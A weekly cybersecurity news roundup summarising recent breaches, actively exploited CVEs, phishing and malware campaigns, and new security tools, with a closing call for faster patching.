From long-ignored Linux vulnerabilities to AI-driven phishing campaigns and supply chain compromises, this week’s cybersecurity landscape highlights one clear trend: attackers are moving faster than defenders can patch.
This week in cybersecurity saw a sharp rise in real-world exploitation of known vulnerabilities, continued abuse of developer tools in supply chain attacks, and increasingly sophisticated phishing operations that bypass traditional security controls.
⚡ Threat of the Week: GitHub Breach Linked to Compromised VS Code Extension
GitHub confirmed a major security incident involving the compromise of an employee device through a trojanized version of the Nx Console Visual Studio Code extension.
The attack, attributed to a cybercriminal group tracked as TeamPCP, led to the theft of approximately 3,800 internal repositories.
Investigators linked the incident to a broader supply chain campaign involving the TanStack ecosystem compromise, which also impacted organizations such as OpenAI, Mistral AI, and Grafana Labs.
Security researchers warn that publicly released tooling associated with the campaign has lowered the barrier for similar attacks, increasing the long-term risk to developer environments and open-source ecosystems.
🔔 Top Security Headlines
Microsoft Disrupts Fox Tempest Malware Infrastructure
Microsoft has taken action against the threat group Fox Tempest, an upstream enabler in multiple ransomware and malware operations including Rhysida, Oyster, Lumma Stealer, and Vidar.
The group was known for distributing fraudulent code-signing services, allowing attackers to deploy malicious software with reduced detection risk by exploiting trusted signing mechanisms.
Nine-Year-Old Linux Kernel Bug Enables Root Execution
A newly tracked vulnerability, CVE-2026-46333, has been found in the Linux kernel, silently present since 2016.
The flaw stems from improper privilege handling and can allow local attackers to escalate privileges, access sensitive files, and execute commands as root on widely used distributions including Debian, Fedora, and Ubuntu.
Active Exploitation of Microsoft Defender Zero-Days
Microsoft confirmed active exploitation of two vulnerabilities affecting Microsoft Defender:
- CVE-2026-41091 (privilege escalation to SYSTEM level)
- CVE-2026-45498 (denial-of-service condition)
While official attribution is still unclear, the flaws closely match previously disclosed “RedSun” and “UnDefend” zero-days, suggesting ongoing exploitation in the wild.
Drupal Core Vulnerability Under Mass Attack
A critical SQL injection vulnerability in Drupal Core (CVE-2026-9082) is being actively exploited shortly after public disclosure.
Security firm Imperva reported over 15,000 attack attempts targeting nearly 6,000 websites across 65 countries, highlighting how quickly attackers weaponize newly disclosed flaws.
AI Security Tools Discover Thousands of Vulnerabilities
Anthropic’s Project Glasswing has reportedly identified more than 10,000 potential high- and critical-severity vulnerabilities across widely used open-source software.
Of these, over 1,000 have already been confirmed as valid security issues, with dozens patched upstream and additional advisories issued.
Cisco Issues Patch for Critical Secure Workload Flaw
Cisco has released fixes for CVE-2026-20223, a maximum-severity vulnerability in Secure Workload that could allow unauthenticated attackers to access sensitive data and modify configurations across tenant environments via API abuse.
Microsoft Mitigates YellowKey BitLocker Bypass
Microsoft has issued mitigations for CVE-2026-45585, a BitLocker bypass vulnerability affecting multiple Windows and Windows Server versions.
The flaw requires physical access and could allow attackers to extract encrypted data by bypassing device encryption protections.
🔥 Trending CVEs This Week
A large number of high-risk vulnerabilities are currently being actively monitored or exploited, including:
- CVE-2026-46333 (Linux Kernel privilege escalation)
- CVE-2026-9082 (Drupal Core SQL injection)
- CVE-2026-20223 (Cisco Secure Workload API flaw)
- CVE-2026-41091 / CVE-2026-45498 (Microsoft Defender issues)
- CVE-2026-45585 (Windows BitLocker bypass)
- Multiple vulnerabilities across Chrome, PostgreSQL, Splunk, MongoDB, Apache OFBiz, and UniFi OS
Security teams are urged to prioritize patching widely exposed systems first, especially internet-facing services.
🌍 Around the Cyber Threat Landscape
Vulnerability Exploitation Surpasses Credential Theft
According to Verizon’s latest findings, vulnerability exploitation has overtaken stolen credentials as the leading initial access method in cyberattacks for the first time in nearly 20 years.
Nearly 31% of breaches now begin with exploited software flaws, signaling a major shift in attacker behavior.
Education Sector Targeted in Phishing Campaigns
Threat actors are increasingly targeting India’s education ecosystem using fake admission, scholarship, and fee payment lures.
Attackers exploit student data and institutional branding to build convincing phishing portals designed to steal credentials and financial information.
Botnets Exploit ASUS Router Vulnerability
The RondoDox botnet has added CVE-2018-5999, a critical ASUS router vulnerability, to its exploitation toolkit.
Researchers observed active exploitation against honeypots, with attackers attempting to enable hidden services for configuration hijacking.
Fake Microsoft Teams Sites Deliver ValleyRAT
Cybercriminals are distributing trojanized Microsoft Teams installers via phishing campaigns, leading to the deployment of ValleyRAT malware.
The attack chain uses DLL sideloading and legitimate Tencent binaries to evade detection and maintain stealth.
Android NFC Malware Expands in Europe and LATAM
Two new Android malware families, DevilNFC and NFCMultiPay, are targeting banking users through NFC relay attacks.
The malware captures card PINs and enables unauthorized transactions, using relay techniques and kiosk-mode locking to trap victims during the attack.
Ethereum-Based Botnet C2 Emerges
A new malware family called Void Botnet uses Ethereum smart contracts as a command-and-control channel, making takedown efforts significantly harder.
The botnet allows operators to switch between blockchain-based and traditional web-based control mechanisms.
🧰 Security Tools of the Week
- Bumblebee – A lightweight macOS and Linux tool that scans developer environments for supply chain vulnerabilities without executing code.
- Claude-BugHunter – An AI-assisted security add-on that helps automate vulnerability discovery and reporting using structured attack patterns.
🧠 Final Takeaway
This week reinforces a clear pattern: attackers are not waiting for organizations to catch up.
Old vulnerabilities are being rediscovered and weaponized, developer tools are being used as attack vectors, and phishing is evolving into fully automated, AI-assisted operations.
The gap between disclosure and exploitation continues to shrink—and in many cases, it has already disappeared.
